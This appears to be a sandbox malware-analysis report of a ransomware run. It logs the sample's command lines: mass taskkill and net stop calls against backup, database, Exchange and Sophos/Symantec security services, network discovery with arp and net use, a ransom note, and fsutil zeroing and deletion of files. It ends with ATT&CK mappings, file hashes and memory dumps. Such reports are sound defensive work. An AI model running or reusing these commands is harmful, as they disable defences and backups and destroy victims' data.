C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11036

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11028

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11020

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11012

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11004

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10996

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10988

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10980

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10972

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10964

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10956

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10948

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10940

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10932

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
2⤵
PID:5748

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:5732

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
2⤵
PID:5724

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
2⤵
PID:5716

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
2⤵
PID:5692

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
2⤵
PID:5684

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:5676

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
2⤵
PID:5668

C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
2⤵
PID:5652

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
2⤵
PID:5644

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:5636

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
2⤵
PID:5620

C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
2⤵
PID:5612

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
2⤵
PID:5604

C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
2⤵
PID:5596

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
2⤵
PID:5588

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
2⤵
PID:5572

C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
2⤵
PID:5564

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
2⤵
PID:5556

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:5548

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
2⤵
PID:5540

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
2⤵
PID:5532

C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
2⤵
PID:5524

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
2⤵
PID:5516

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
2⤵
PID:5508

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
2⤵
PID:5500

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
2⤵
PID:5492

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
2⤵
PID:5476

C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
2⤵
PID:5468

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
2⤵
PID:5460

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
2⤵
PID:5452

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
2⤵
PID:5444

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
2⤵
PID:5436

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
2⤵
PID:5424

C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
2⤵
PID:5416

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
2⤵
PID:5408

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
2⤵
PID:5400

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
2⤵
PID:5392

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
2⤵
PID:5384

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
2⤵
PID:5376

C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
2⤵
PID:5368

C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
2⤵
PID:5356

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
2⤵
PID:5348

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:5336

C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
2⤵
PID:5328

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
2⤵
PID:5320

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
2⤵
PID:5312

C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
2⤵
PID:5304

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
2⤵
PID:5296

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
2⤵
PID:5288

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
2⤵
PID:5280

C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
2⤵
PID:5268

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
2⤵
PID:5260

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
2⤵
PID:5252

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
2⤵
PID:5244

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
2⤵
PID:5236

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
2⤵
PID:5228

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
2⤵
PID:5220

C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
2⤵
PID:5212

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
2⤵
PID:5204

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
2⤵
PID:5192

C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
2⤵
PID:5184

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
2⤵
PID:5176

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
2⤵
PID:5168

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
2⤵
PID:5156

C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
2⤵
PID:5148

C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
2⤵
PID:5140

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:5132

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:5124

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:3080

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:4300

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:4736

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
2⤵
PID:5064

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:4812

C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
2⤵
PID:1880

C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
2⤵
PID:4752

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
2⤵
PID:4876

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
2⤵
PID:4536

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
2⤵
PID:4712

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:17336

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.86
2⤵
PID:17372

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.64
2⤵
PID:9648

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:16204

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:15952

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:5844

C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:13384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\wqm58yk7.exe
2⤵
PID:12192

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:1240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
1⤵
PID:1448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
1⤵
PID:3196

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:4040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
1⤵
PID:1136

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:1676

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:1160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
1⤵
PID:4532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:8060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
1⤵
PID:11584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:12124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:12340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:12196

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:12156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:12172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
1⤵
PID:12180

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:12164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
1⤵
PID:12188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:12140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:12100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:12108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:12132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:12116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:12084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:12092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:12144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:12068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:12076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:12060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:11988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:12020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:11996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:12028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:12036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:2548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:14932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:14912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:14892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
1⤵
PID:14876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:14852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
1⤵
PID:14804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
1⤵
PID:14508

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:14492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
1⤵
PID:14468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:14436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:14428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:14420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
1⤵
PID:14412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
1⤵
PID:14404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
1⤵
PID:14372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:4288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
1⤵
PID:14280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1⤵
PID:14272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
1⤵
PID:14144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
1⤵
PID:14056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
1⤵
PID:14048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
1⤵
PID:14000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:13968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
1⤵
PID:13952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:13904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
1⤵
PID:13872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
1⤵
PID:13848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
1⤵
PID:13832

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
1⤵
PID:13824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:13752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:13744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:13404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:13324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
1⤵
PID:1876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
1⤵
PID:11484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:3592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:3880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:4608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:12044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:12052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:12012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
1⤵
PID:12004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:11980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:11928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:11892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:11884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:11868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:11860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:11852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:11844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
1⤵
PID:11576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:7612

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
830150c27ebdbf5f34cf2cc4680bac33

SHA1
f890338357afbadcfec2acf302900b5cabc53f35

SHA256
f3c222e4ac8a60b24191dbb2db3909193764c832bdb9039ec1de4470a887319d

SHA512
8baf0207d59d3d8447a0b3b9deef1388695121688a8206e3c23ebebf6e7501c2b311d1636324f9fbef88a624d92e78a9a49f40d372c63ac2a18470846e54d33e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0006ed786477bcc38e0f35821569deeb

SHA1
cdf6496f564b6d622142e3a9f39a67d792e11075

SHA256
38cee66ca378d9430c538ebcc06d3842d541ef15dc23b334ac0749664ad15e78

SHA512
0ba670f96c8df6d178282ba617177ea6bd2ff22dc74e0e87f79342c0667fededca157b90fe0cffb50b25dcc7590115a4b561a9a0103a2219841dbdf37a9f178d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
MD5
779c6cdc112ba6121fefa749025ca1bd

SHA1
1dd29c2175c1898a728e74c16c3e59bd6129e366

SHA256
92dce553e037ac7a00db77c6bb25bf8d63d3e5139bca48ab4c84b5e6e0499401

SHA512
659d1a9706801decbe5941ff84e6bcb589e74f35003abb1915a6d78a08a87035001bef4350b4d0e5d067de630078e050d8d53a7bc556366df4304b104f299f89

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
MD5
3109455faa909d782d9ad4bd2534ef15

SHA1
bdfd4985123a62ef227370fe2f3e290dae967150

SHA256
6013bb602f79daac8e0c736ece3bc35f736a34866133b94b3f9d513299f2a0de

SHA512
d7a0732649a9f0e1d127d74dc94df874b49c486b972fd6b0e42a33fa2d8c183c35c1e23f17fbb0e3d56d5317d50a76eadb141243f20394037d108302c1ce34e8

Download Submit
memory/60-83-0x0000000000000000-mapping.dmp

Download
memory/64-82-0x0000000000000000-mapping.dmp

Download
memory/188-52-0x0000000000000000-mapping.dmp

Download
memory/204-53-0x0000000000000000-mapping.dmp

Download
memory/604-39-0x0000000000000000-mapping.dmp

Download
memory/664-54-0x0000000000000000-mapping.dmp

Download
memory/764-66-0x0000000000000000-mapping.dmp

Download
memory/880-40-0x0000000000000000-mapping.dmp

Download
memory/1136-94-0x0000000000000000-mapping.dmp

Download
memory/1184-41-0x0000000000000000-mapping.dmp

Download
memory/1260-80-0x0000000000000000-mapping.dmp

Download
memory/1272-42-0x0000000000000000-mapping.dmp

Download
memory/1288-137-0x000000007E430000-0x000000007E431000-memory.dmp

Filesize
4KB

Download
memory/1288-141-0x0000000009670000-0x0000000009671000-memory.dmp

Filesize
4KB

Download
memory/1288-101-0x0000000073370000-0x0000000073A5E000-memory.dmp

Filesize
6.9MB

Download
memory/1288-85-0x0000000000000000-mapping.dmp

Download
memory/1288-142-0x0000000009010000-0x0000000009011000-memory.dmp

Filesize
4KB

Download
memory/1288-113-0x00000000075C0000-0x00000000075C1000-memory.dmp

Filesize
4KB

Download
memory/1288-119-0x0000000007FA0000-0x0000000007FA1000-memory.dmp

Filesize
4KB

Download
memory/1288-139-0x0000000008FC0000-0x0000000008FC1000-memory.dmp

Filesize
4KB

Download
memory/1288-104-0x00000000065C0000-0x00000000065C1000-memory.dmp

Filesize
4KB

Download
memory/1288-136-0x0000000008F10000-0x0000000008F11000-memory.dmp

Filesize
4KB

Download
memory/1288-105-0x00000000065C2000-0x00000000065C3000-memory.dmp

Filesize
4KB

Download
memory/1288-138-0x00000000065C3000-0x00000000065C4000-memory.dmp

Filesize
4KB

Download
memory/1376-58-0x0000000000000000-mapping.dmp

Download
memory/1392-43-0x0000000000000000-mapping.dmp

Download
memory/1448-87-0x0000000000000000-mapping.dmp

Download
memory/1464-84-0x0000000000000000-mapping.dmp

Download
memory/1524-44-0x0000000000000000-mapping.dmp

Download
memory/1548-46-0x0000000000000000-mapping.dmp

Download
memory/1668-81-0x0000000000000000-mapping.dmp

Download
memory/1780-45-0x0000000000000000-mapping.dmp

Download
memory/2160-88-0x0000000000000000-mapping.dmp

Download
memory/2164-47-0x0000000000000000-mapping.dmp

Download
memory/2368-64-0x0000000000000000-mapping.dmp

Download
memory/2376-67-0x0000000000000000-mapping.dmp

Download
memory/2500-86-0x0000000000000000-mapping.dmp

Download
memory/2552-48-0x0000000000000000-mapping.dmp

Download
memory/2672-50-0x0000000000000000-mapping.dmp

Download
memory/2676-51-0x0000000000000000-mapping.dmp

Download
memory/2816-49-0x0000000000000000-mapping.dmp

Download
memory/3012-59-0x0000000000000000-mapping.dmp

Download
memory/3196-92-0x0000000000000000-mapping.dmp

Download
memory/3280-33-0x0000000009130000-0x0000000009131000-memory.dmp

Filesize
4KB

Download
memory/3280-35-0x0000000009110000-0x0000000009111000-memory.dmp

Filesize
4KB

Download
memory/3280-7-0x0000000000000000-mapping.dmp

Download
memory/3280-8-0x0000000073370000-0x0000000073A5E000-memory.dmp

Filesize
6.9MB

Download
memory/3280-9-0x00000000043A0000-0x00000000043A1000-memory.dmp

Filesize
4KB

Download
memory/3280-10-0x0000000007050000-0x0000000007051000-memory.dmp

Filesize
4KB

Download
memory/3280-11-0x0000000006A10000-0x0000000006A11000-memory.dmp

Filesize
4KB

Download
memory/3280-12-0x0000000006A12000-0x0000000006A13000-memory.dmp

Filesize
4KB

Download
memory/3280-13-0x0000000006D00000-0x0000000006D01000-memory.dmp

Filesize
4KB

Download
memory/3280-14-0x0000000006EA0000-0x0000000006EA1000-memory.dmp

Filesize
4KB

Download
memory/3280-16-0x0000000007860000-0x0000000007861000-memory.dmp

Filesize
4KB

Download
memory/3280-31-0x000000007EAD0000-0x000000007EAD1000-memory.dmp

Filesize
4KB

Download
memory/3280-32-0x0000000006A13000-0x0000000006A14000-memory.dmp

Filesize
4KB

Download
memory/3280-17-0x0000000007010000-0x0000000007011000-memory.dmp

Filesize
4KB

Download
memory/3280-30-0x00000000091D0000-0x00000000091D1000-memory.dmp

Filesize
4KB

Download
memory/3280-18-0x0000000007F80000-0x0000000007F81000-memory.dmp

Filesize
4KB

Download
memory/3280-19-0x0000000007EB0000-0x0000000007EB1000-memory.dmp

Filesize
4KB

Download
memory/3280-29-0x0000000009020000-0x0000000009021000-memory.dmp

Filesize
4KB

Download
memory/3280-28-0x0000000008C40000-0x0000000008C41000-memory.dmp

Filesize
4KB

Download
memory/3280-21-0x0000000008C60000-0x0000000008C93000-memory.dmp

Filesize
204KB

Download
memory/3340-79-0x0000000000000000-mapping.dmp

Download
memory/3372-77-0x0000000000000000-mapping.dmp

Download
memory/3452-73-0x0000000000000000-mapping.dmp

Download
memory/3572-74-0x0000000000000000-mapping.dmp

Download
memory/3620-75-0x0000000000000000-mapping.dmp

Download
memory/3656-63-0x0000000000000000-mapping.dmp

Download
memory/3664-90-0x0000000000000000-mapping.dmp

Download
memory/3916-96-0x0000000000000000-mapping.dmp

Download
memory/3956-55-0x0000000000000000-mapping.dmp

Download
memory/4040-98-0x0000000000000000-mapping.dmp

Download
memory/4048-62-0x0000000000000000-mapping.dmp

Download
